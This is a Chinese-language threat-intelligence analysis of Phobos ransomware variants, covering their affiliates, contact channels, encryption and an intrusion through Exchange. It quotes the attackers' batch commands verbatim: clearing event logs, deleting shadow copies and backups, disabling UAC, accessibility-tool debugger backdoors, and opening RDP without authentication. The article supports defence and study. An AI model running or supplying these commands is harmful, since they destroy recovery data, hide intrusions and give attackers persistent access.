Phobos 勒索軟件是 Dharma/Crysis 勒索軟件的變種,自從 2019 年被發現后攻擊活動一直很活躍,但樣本的迭代升級并不多。

研究人員根據 VirusTotal 中的樣本量,確定了 Phobos 勒索軟件家族中最多產的五個變種。區分樣本文件的唯一特征是惡意軟件構建工具的配置,不同變種的配置文件也存在差別。樣本文件都使用相同的源碼進行編譯,并且會避免加密其他 Phobos 組織已加密的文件。

如下所示,8Base 勒索軟件團伙部署的 Phobos 樣本文件中包含不加密其的其他 Phobos 變種列表。所有樣本文件中的配置,都會將特定的組織名稱添加到列表的開頭。

跳過文件擴展名列表

一旦提取了樣本文件的配置并且確認為 Phobos 變種,將攻擊活動相關的唯一 ID 來統計最活躍的 Phobos 附屬機構。

  • Eking:從 2019 年一直保持活躍,通常針對亞太地區發起攻擊。
  • Eight:被認為是運營 8Base 的同一攻擊組織的舊攻擊行動。
  • Elbie:從 2022 年一直保持活躍,也是針對亞太地區發起攻擊。
  • Devos:自 2019 年來一直很活躍,但攻擊手法變化不大。
  • Faust:自 2022 年來一直很活躍,但不針對特定地區進行攻擊。

變種樣本文件間的區別在于加密文件的文件擴展名中的電子郵件地址,以及配置中的勒索信息,其余所有配置都相同。分析過的所有 Phobos 變種中使用的文件擴展名都遵循相同的結構,ID 為受害者的驅動器序列號,下一個數字是當前攻擊行動的標識符,最后列出聯系攻擊者的電子郵件地址,以及變種的特定擴展名。

.id[<>-3253].[musonn@airmail[.]cc].eking

這些變種文件在過去幾年中使用了數百個不同的電子郵件地址,如下所示:

變種文件使用的電子郵件計數

攻擊者通常使用免費或者安全的電子郵件服務提供商,如下所示:

服務提供商統計

某些情況下,附屬機構還會使用 ICQ、Jabber 與 QQ 等即時通訊服務進行運營。各個攻擊者的選擇如下所示:

通訊服務提供商

Devos 使用 QQ,而 Eight 使用 ICQ,甚至還有攻擊者選擇使用安全郵件服務 Proton Mail。這也可以看出,Phobos 擁有多個分散的附屬機構,通過勒索軟件即服務(RaaS)進行運營。

Phobos 攻擊手段

2023 年初,分析人員發現 Elbie 的攻擊行動。攻擊者入侵了 Exchange 服務器,然后通過橫向平移入侵了備份服務器、數據庫服務器與虛擬機管理服務器。攻擊者并未將勒索軟件同時部署到全部機器,而是只針對特定的目標單獨部署勒索軟件。Phobos 的附屬機構通常會追尋受害者網絡中的高價值服務器,以此增加勒索成功的概率。

成功入侵 Exchange 服務器后,攻擊者在失陷主機的桌面創建一個目錄,并且釋放以下各種工具:

  • Process Hacker:進程分析工具,攻擊者濫用其內核驅動程序刪除文件、刪除服務、終止進程
  • Automim:自動收集憑據,包含 LaZagne 與 Mimikatz
  • IObit File Unlocker:刪除其他應用程序打開的鎖定文件的工具,擴大加密文件的覆蓋面
  • Nirsoft Password Recovery Toolkit:提取瀏覽器與電子郵件客戶端等常見應用程序密碼的工具
  • NS.exe:掃描網絡中開放服務并進行橫向平移的程序
  • Angry IP Scanner:掃描開放服務并識別機器網絡信息的工具

除此之外,還有一些批處理文件。一個批處理文件可以清除失陷主機上的 Windows 事件日志,最大程度上消除取證痕跡增大分析困難。

FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I")

另一個批處理腳本負責刪除卷影副本,使 Phobos 感染后的恢復變得更困難。

vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit

以上腳本也包含在 Phobos 的配置文件中,在開始文件加密前會被保存為 .bat 文件執行。

此外也有處理 Windos 注冊表的批處理文件,通過 Windows 輔助功能生成系統級命令提示符,繞過身份驗證。攻擊者將其當作持久化機制,支持攻擊者后期通過 RDP 重新獲取對系統的完全控制。

該腳本通過設置注冊表項禁用用戶賬戶控制(UAC):

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

接下來,腳本執行使攻擊者通過 Windows 登錄屏幕調用輔助功能執行提權后的 Shell 命令。每當啟動這些應用程序時,指定的調試應用程序都會以高權限啟動。

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

最后,該腳本啟動 RDP 并禁用網絡身份驗證的各項注冊表:

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

攻擊者使用的另一個腳本負責在失陷主機上進行以下服務配置更改:

sc config Dnscache start= auto
net start Dnscache
sc config SSDPSRV start= auto
net start SSDPSRV
sc config FDResPub start= auto
net start FDResPub
sc config upnphost start= auto
net start upnphost

執行以下命令在失陷主機上啟用文件共享:

dism /online /enable-feature /featurename:File-Services /NoRestart

攻擊者嘗試卸載失陷主機上的安全防護軟件,最大限度地減少對攻擊過程中的檢測。防御手段被禁用并且啟動持久化后,攻擊者就會部署 Phobos 勒索軟件對文件進行加密。勒索信息 info.hta 會被釋放到用戶桌面上,其中包含有關如何聯系攻擊者的詳細信息。

勒索信息

背后的附屬機構

通過對 Phobos 攻擊行動與惡意樣本文件的分析,研究人員對該勒索軟件的附屬機構與開發人員有了更多的了解。

VirusTotal 上的每個 Phobos 變種,都至少與十幾個電子郵件地址有關,甚至有的還擁有近 200 個不同域名的電子郵件地址。攻擊者如此頻繁更改電子郵件地址的情況并不常見,額外付出的時間和精力成本是巨大的。有些勒索軟件團伙只使用幾個電子郵件地址也很成功,例如 8Base 只使用一個電子郵件地址 support@rexsdata[.]pro。

分析人員認為,Phobos 可能受到控制勒索軟件解密私鑰的中央機構的緊密控制。每個 Phobos 加密的文件都會生成一個隨機的 AES 密鑰,再使用配置文件中的 RSA 公鑰對密鑰與元數據進行加密,再將該數據保存到加密文件末尾。所以,解密該文件需要與 RSA 公鑰對應的私鑰。

不同樣本文件中的 RSA 公鑰都相同,這意味著只有一個解密私鑰。分析人員認為,只有一個攻擊者控制著私鑰。攻擊者通過這種方式未附屬機構提供解密服務,以便獲取勒索贖金的分成。

解密工具

分析人員也確實發現了解密工具,聲稱能夠解密 Elbie 變種的樣本文件。但其實,這些解密工具并不能解密加密文件。第一部分是包含 base64 編碼的加密數據塊文件,推測是 RSA 私鑰。而第二部分是用于解密該數據塊的密碼。如果能找到這兩部分數據,付費解密過的受害者給出或者被泄露的情況下,RSA 的私鑰有可能被恢復出來。

勒索軟件不加密的文件列表十分詳細,也支持了分析人員的以上推論。Phobos 會避免加密已經被其他附屬機構加密的文件。分析人員發現,許多 Phobos 樣本文件中的列表會不斷替換為攻擊中出現的最新文件。最可能的情況就是 Phobos 背后有一個運營的中央機構,負責跟蹤各個附屬機構對樣本文件的使用,避免各個附屬機構干擾彼此的攻擊行動。

IOC

58626a9bfb48cd30acd0d95debcaefd188ae794e1e0072c5bde8adae9bccafa6 f3be35f8b8301e39dd3dffc9325553516a085c12dc15494a5e2fce73c77069ed 518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c 32a674b59c3f9a45efde48368b4de7e0e76c19e06b2f18afb6638d1a080b2eb3 2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66 fc4b14250db7f66107820ecc56026e6be3e8e0eb2d428719156cf1c53ae139c6 a91491f45b851a07f91ba5a200967921bf796d38677786de51a4a8fe5ddeafd2

參考來源

Talos
勒索軟件
撤稿糾錯
本作品采用《CC 協議》,轉載必須注明作者和本文鏈接